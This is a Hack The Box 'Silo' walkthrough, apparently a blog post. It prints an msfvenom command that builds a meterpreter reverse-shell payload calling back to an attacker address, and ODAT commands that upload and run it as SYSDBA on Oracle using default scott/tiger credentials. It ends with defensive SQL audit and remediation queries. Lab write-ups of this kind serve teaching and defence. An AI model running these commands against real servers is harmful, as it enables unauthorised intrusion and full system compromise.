Pentest 2 : [htb] Silo, Exploitation Oracle

Hi All,

This post continues the previous article on hacking Silo, a Hack The Box pentest machine.

The steps completed so far were the recon and enumeration phases of the penetration test, so we can now continue with exploitation in order to gain access to the server.

We have the username and password from the previous enumeration, so we can use them to exploit the server and gain access.

ODAT can deliver malware to the system by using Oracle's ability to write a file to the server's filesystem. Let's first create the exploit using msfvenom with the command below:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.73 lport=4545 -f exe > rio.exe

Let's deliver the malware to the server with ODAT, using its utlfile functionality. The command looks like this:

./odat.py utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ rio.exe rio.exe

We have now successfully delivered our exploit to the server using Oracle's file-write function. The malware was placed at C:/rio.exe.

Next we can invoke the malware using Oracle's ability to run an executable when loading an external table. Before we execute the exploit, let's set up the reverse handler using the Metasploit multi handler.

After we have created the reverse handler, we can invoke the exploit on the remote server. We can use the ODAT command below:

./odat.py externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ rio.exe

After ODAT has successfully executed the remote exploit, we can check the reverse handler in Metasploit; there should be one session created, as in the image below.

We can now start interacting with the established session using the command

sessions -i 1 (1 is the session id)

Meterpreter provides a lot of functionality that you can use during post-exploitation; just type help in the meterpreter session to list it.

For example, we can check who we are on the target system by using the command below:

meterpreter > getuid

We can see from the picture above that we are running as the highest-privilege account on the server. You can also list the privileges that you hold by using this command:

meterpreter > getprivs

OK, that is all for this lab. We were able to hack the server and get the highest privilege. In the next post I will show you another technique that involves a bit more manual work but is also effective for some exploitation scenarios.
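From the defender's side, the chain above depends on three database conditions: an account with a default password that may connect as SYSDBA, access to UTL_FILE, and external tables that can run a program. The SQL below is an added example, not part of the original post or of ODAT; it assumes an Oracle 11g-style data dictionary and a DBA session, and uses SCOTT only because that is the account in the walkthrough.

```sql
-- Added defensive audit (not from the original post). Run as a DBA on the
-- database under review.

-- 1. Accounts allowed to connect AS SYSDBA / SYSOPER (password-file users).
SELECT username, sysdba, sysoper
FROM   v$pwfile_users;

-- 2. Open accounts that still have a well-known default password.
SELECT d.username, u.account_status
FROM   dba_users_with_defpwd d
JOIN   dba_users u ON u.username = d.username
WHERE  u.account_status = 'OPEN';

-- 3. Who can execute UTL_FILE, the package behind the file-write step.
SELECT grantee, privilege
FROM   dba_tab_privs
WHERE  owner = 'SYS'
AND    table_name = 'UTL_FILE';

-- 4. Directory objects (the filesystem paths the database can reach)
--    and the accounts that are able to create new ones.
SELECT owner, directory_name, directory_path
FROM   dba_directories;

SELECT grantee, privilege
FROM   dba_sys_privs
WHERE  privilege = 'CREATE ANY DIRECTORY';

-- 5. External tables whose access parameters name a PREPROCESSOR program,
--    which is Oracle's mechanism for running an executable on table read.
SELECT owner, table_name, default_directory_name
FROM   dba_external_tables
WHERE  UPPER(access_parameters) LIKE '%PREPROCESSOR%';

-- Remediation for the findings the walkthrough relies on.
-- Only needed if query 1 lists SCOTT:
REVOKE SYSDBA FROM scott;
ALTER USER scott PASSWORD EXPIRE ACCOUNT LOCK;
-- Test applications first: some depend on the PUBLIC grant.
REVOKE EXECUTE ON sys.utl_file FROM PUBLIC;
```

Queries 1 to 5 are read-only; review their output before running the remediation statements, since an external table created and dropped during an attack will no longer appear in query 5.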
